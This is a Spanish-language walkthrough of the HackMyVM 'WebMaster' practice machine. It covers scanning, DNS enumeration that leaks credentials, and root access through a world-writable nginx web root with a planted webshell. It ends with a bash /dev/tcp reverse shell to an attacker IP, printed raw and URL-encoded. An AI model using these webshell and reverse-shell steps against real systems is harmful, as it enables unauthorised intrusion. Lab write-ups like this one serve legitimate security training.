HackMyVM WebMaster — Linux

Gm4tsyGm4tsy
2 min read

Para poder hacer uso de esta máquina primero debemos descargar el archivo y así poder desplegar el laboratorio.

Descargamos el archivo de la página https://hackmyvm.eu/machines/

Al momento de descargar esta máquina y descomprimir el archivo, en este caso observamos un archivo.

Para desplegar el laboratorio usaremos nuestro hipervisor favorito e iniciamos la máquina. En caso de no observar la IP de la máquina podemos emplear arp-scan para ver la dirección IP en nuestra red que sería la 192.168.0.118.

Realizamos un ping a la dirección IP y podemos validar que tenemos alcance.

Empezamos con un escaneo de puertos y podemos ver que identifica 3 puertos.

Realizamos un escaneo más profundo y podemos ver más información.

Ingresamos la dirección IP en el navegador podemos ver un meme. Pero inspeccionando la página vemos comentado el nombre del dominio.

Agregamos el dominio en el archivo hosts.

Vamos al dominio para revisar si hubo cambios, pero todo sigue igual.

Realizamos un escaneo de subdirectorios, pero no vemos nada adicional.

Intentamos buscando algún subdominio tampoco vemos algún resultado.

Ya que tenemos el puerto 53 probaremos realizando una enumeración DNS con dig y podemos ver que tenemos un resultado muy interesante que podría indicarnos un posible usuario y una credencial.

Probamos acceder con las credenciales y son correctas, estamos dentro.

Realizamos un sudo -l y tenemos al binario nginx con todos los permisos.

Recordando también vimos la versión de nginx durante el escaneo de puertos, el cual era la versión 1.14.2.

Revisamos algunas carpetas del servicio y vemos que se sirve en el directorio web, el cual podríamos intuir al ver el escaneo anterior.

Al dirigirnos a la carpeta del contenido web, podemos observar que los permisos están mal configurados y cualquiera usuario puede escribir en ellos.

Como vimos que está mal configurado, creamos un webshell simple.

Vamos al navegador e ingresamos el nombre del archivo y podemos ver que ejecutamos comandos como root.

Iniciaremos nuestro listener

Preparamos nuestra consulta que nos conecte en el listener.

bash -c 'bash -i >& /dev/tcp/192.168.0.109/1234 0>&1'
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.109%2F1234%200%3E%261%22

Enviamos la consulta con nuestros comandos y si se queda cargando es buena señal.

Vamos a nuestro listener y podemos observar que ya tenemos un acceso más práctico. De esta manera culminamos esta máquina.

0
Subscribe to my newsletter

Read articles from Gm4tsy directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Gm4tsy
Gm4tsy